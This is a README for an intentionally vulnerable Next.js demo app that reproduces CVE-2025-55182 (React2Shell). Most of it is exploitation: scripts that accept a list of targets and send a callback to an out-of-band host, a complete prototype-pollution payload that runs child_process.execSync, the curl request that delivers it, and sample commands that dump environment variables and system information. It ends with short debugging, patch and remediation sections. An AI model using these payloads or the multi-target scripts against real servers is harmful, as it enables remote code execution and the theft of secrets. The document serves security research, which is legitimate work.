CVE-2025-55182 (React2Shell) Demo Application

This is a demo application to reproduce and debug the CVE-2025-55182 vulnerability, also known as "React2Shell". This vulnerability allows remote code execution in React Server Components and Next.js applications.

⚠️ WARNING

This application is intentionally vulnerable and should NEVER be exposed to the internet or used in production environments. It is for educational and security research purposes only.

Vulnerability Details

• CVE ID: CVE-2025-55182
• Type: Remote Code Execution (RCE)
• CVSS Score: 10.0 (Critical)
• Affected Versions:
  • React Server Components: 19.0, 19.1.0, 19.1.1, 19.2.0
  • Next.js: 15.x, 16.x (up to 16.0.6), 14.3.0-canary.77+

Node.js Version Requirements

This project requires Node.js version >= 20.9.0 (for Next.js compatibility). The project includes a .nvmrc file for easy version management.

Switching Node Versions

If you have nvm installed (Node Version Manager), you can easily switch between versions:

Use the required version (20.9.0):

nvm use 20.9.0
# or simply:
nvm use

Switch back to the old version (20.6.0):

nvm use 20.6.0

List all installed versions:

nvm ls

Current versions available:

• v20.6.0 (old version - kept for compatibility)
• v20.9.0 (required for Next.js - currently active)

Setup Instructions

1. Ensure you're using the correct Node version:

   nvm use  # Uses .nvmrc file (20.9.0)
   node --version  # Should show v20.9.0 or higher

2. Install dependencies:

   npm install

3. Build the application:

   npm run build

4. Start the server:

   npm run start

   The application will be available at http://localhost:3000

Reproducing the Vulnerability

Method 1: Using the Bash Script

The script now supports multiple targets (list file or single URL) and a Burp Collaborator callback.

1. Make the exploit script executable:

   chmod +x exploit.sh

2. Run against a single target and send a callback to a Burp Collaborator URL (default command: curl -s <collaborator>). Targets without a scheme default to https://:

   ./exploit.sh http://localhost:3000 https://abc123.oast.fun

3. Run against a list of targets (one host per line, scheme optional; missing scheme defaults to https://):

   ./exploit.sh targets.txt https://abc123.oast.fun

4. Use a custom command instead of the collaborator callback:

   ./exploit.sh http://localhost:3000 https://abc123.oast.fun "whoami > /tmp/test"

5. Check if the command executed:

   cat /tmp/pwned

Method 2: Using the Python Script

1. Install Python dependencies (if needed):

   pip install requests

2. Run against a single target with Burp Collaborator callback (default command: curl -s <collaborator>). Targets without a scheme default to https://:

   python3 exploit.py http://localhost:3000 https://abc123.oast.fun

3. Run against a list of targets (one host per line, scheme optional; missing scheme defaults to https://):

   python3 exploit.py targets.txt https://abc123.oast.fun

4. Use a custom command:

   python3 exploit.py http://localhost:3000 https://abc123.oast.fun "whoami > /tmp/test"

Method 3: Manual Exploitation

1. Create payload.json:

   {
       "then": "$1:__proto__:then",
       "status": "resolved_model",
       "reason": -1,
       "value": "{\"then\": \"$B0\"}",
       "_response": {
           "_prefix": "process.mainModule.require('child_process').execSync('id > /tmp/pwned');",
           "_formData": {
               "get": "$1:constructor:constructor"
           }
       }
   }

2. Create payload2.txt:

   "$@0"
   

3. Send the exploit request:

   curl -X POST http://localhost:3000 \
       -H "Next-Action: dontcare" \
       -F "0=<payload.json" \
       -F "1=<payload2.txt" \
       --max-time 2

4. Verify command execution:

   cat /tmp/pwned

How It Works

The vulnerability is a server-side prototype pollution issue in React Server Components. The exploit works by:

1. Sending a POST request with specially crafted form data
2. The payload pollutes the prototype chain of JavaScript objects
3. This allows execution of arbitrary code via child_process.execSync

The patch adds a check using hasOwnProperty to prevent prototype pollution:

// Before (vulnerable):
return moduleExports[metadata[NAME]];

// After (patched):
if (hasOwnProperty.call(moduleExports, metadata[NAME])) {
  return moduleExports[metadata[NAME]];
}
return (undefined: any);

Debugging

See EXPLOIT_EXPLANATION.md for a comprehensive explanation of how the exploit works and detailed debugging instructions.

Quick Debugging Setup

1. Enable Node.js debugging:

   NODE_OPTIONS='--inspect' npm run start

2. Attach a debugger:

   • Use Chrome DevTools: chrome://inspect
   • Or use VS Code's debugger

3. Load the debugging helper script:

   • In Chrome DevTools console, paste the contents of debug-script.js
   • This will monitor prototype pollution and code execution

4. Set breakpoints in:

   • node_modules/react-server-dom-parcel/server.js (or similar)
   • Look for the requireModule function

5. Monitor the exploit:

   • Watch for prototype pollution
   • Observe how the payload affects object prototypes
   • Track the execution flow to child_process.execSync

Testing Different Commands

You can test various commands to understand the impact:

# System information
./exploit.sh http://localhost:3000 "uname -a > /tmp/test"

# Network information
./exploit.sh http://localhost:3000 "ifconfig > /tmp/test"

# File system access
./exploit.sh http://localhost:3000 "ls -la / > /tmp/test"

# Environment variables
./exploit.sh http://localhost:3000 "env > /tmp/test"

References

• Datadog Security Labs Article
• React Advisory
• Next.js Advisory
• Original PoC by Moritz Sanft

Remediation

To fix this vulnerability, upgrade to a patched version:

• React Server Components: 19.0.1, 19.1.2, or 19.2.1
• Next.js: 15.0.5+, 15.1.9+, 15.2.6+, 15.3.6+, 15.4.8+, 15.5.7+, or 16.0.7+

Check your dependencies:

npm audit

License

This demo application is provided for educational purposes only. Use responsibly and only in controlled environments.